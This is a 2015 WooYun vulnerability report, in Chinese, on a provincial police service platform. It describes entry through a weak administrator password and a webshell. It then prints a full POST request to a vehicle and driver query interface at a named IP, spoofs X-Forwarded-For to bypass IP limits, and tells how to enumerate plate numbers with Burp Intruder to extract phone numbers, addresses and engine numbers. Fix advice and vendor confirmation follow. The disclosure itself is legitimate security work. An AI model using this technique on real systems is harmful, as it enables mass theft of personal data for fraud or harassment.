一次成功获取X省车辆和驾驶员信息的经历

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111001

漏洞标题：一次成功获取X省车辆和驾驶员信息的经历

漏洞作者：路人甲

提交时间：2015-04-29 10:27

修复时间：2015-06-14 12:00

公开时间：2015-06-14 12:00

漏洞类型：内容安全

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-29：细节已通知厂商并且等待厂商处理中
2015-04-30：厂商已经确认，细节仅向厂商公开
2015-05-10：细节向核心白帽子及相关领域专家公开
2015-05-20：细节向普通白帽子公开
2015-05-30：细节向实习白帽子公开
2015-06-14：细节向公众公开

简要描述：

故事从某支持查询违章和驾驶员档案信息的网站开始，到发现信息调用接口，再到突破IP限制强制查询。
查询是有前提的，如查车辆要知道车牌号，如查驾驶员要知道身份证号码
综合攻击利用场景：
利用车辆牌照号码任意查询和驾驶员档案信息任意查询车辆发动机号码、手机号码、违章信息和驾驶员档案编号、户口地址、手机号码，可以用于营销、诈骗、打击报复等。

详细说明：

漏洞证明：

在对吉林省公安厅网上服务平台

http://gafw.jl.gov.cn/

再次进行漏洞检测验证时发现没有发现明显的信息安全漏洞。
但经过对业务系统的分析，猜解用户账户和密码时发现存在一个地区管理员弱口令，就这样我进入了管理后台。

再次利用之前的漏洞
WooYun: 某省敏感部门网上服务平台存在SQL注入和任意文件上传漏洞
成功获取webshell
接着找到了查询违章的页面代码

然后进入接口页面

到这里是最复杂难懂的了，我测试了很久，分析业务逻辑和传输的变量之后才得出以下利用方法，不介绍分析过程了
查询车辆违章信息

http://222.169.230.88:9015/iViolation.asmx?op=GetVehicleInfo

POST如下数据即可

POST /iViolation.asmx/GetVehicleInfo HTTP/1.1
Accept: */*
Referer: http://222.169.230.88:9015/iViolation.asmx?op=GetVehicleInfo
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
X-Forwarded-For:127.0.0.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 222.169.230.88:9015
Content-Length: 49
Proxy-Connection: Keep-Alive
Pragma: no-cache
type=02&number=%E5%90%89CJ0000&engine=0000&other=

将上面的POST数据放入burpsuite intruder变换2473从0000-9999即可
number是车牌照号码
type是车辆类型，通过首页查询违章时选择小汽车就是02
注意：正常该接口限制了查询客户端的IP地址，此时利用

X-Forwarded-For:127.0.0.1

突破
演示结果
正常业务显示

接口返回的数据可比这多多了

至此我们获取到了车辆的

发动机号码、手机号码、违章信息

查询驾驶员信息

http://222.169.230.88:9015/iViolation.asmx?op=GetDriverInfo

首先找一个有驾照的身份证号码

直接演示结果

至此我们获取到了驾驶员的

档案编号、户口地址、手机号码

综合攻击利用场景：
利用车辆牌照号码任意查询和驾驶员档案信息任意查询车辆发动机号码、手机号码、违章信息和驾驶员档案编号、户口地址、手机号码，可以用于营销、诈骗、打击报复等。

修复方案：

1.加强口令使用规范，严格杜绝弱口令问题
2.即便上传漏洞需要管理员才能利用，也需要对其进行修复
3.对接口加强查询限制，如增加验证码机制、严格限制客户端IP、过滤返回数据等。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-04-30 12:00

厂商回复：

验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111001

漏洞标题：一次成功获取X省车辆和驾驶员信息的经历

相关厂商：公安部一所

漏洞作者：路人甲

提交时间：2015-04-29 10:27

修复时间：2015-06-14 12:00

公开时间：2015-06-14 12:00

漏洞类型：内容安全

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111001

漏洞标题：一次成功获取X省车辆和驾驶员信息的经历

相关厂商：公安部一所

漏洞作者： 路人甲

提交时间：2015-04-29 10:27

修复时间：2015-06-14 12:00

公开时间：2015-06-14 12:00

漏洞类型：内容安全

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0111001"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云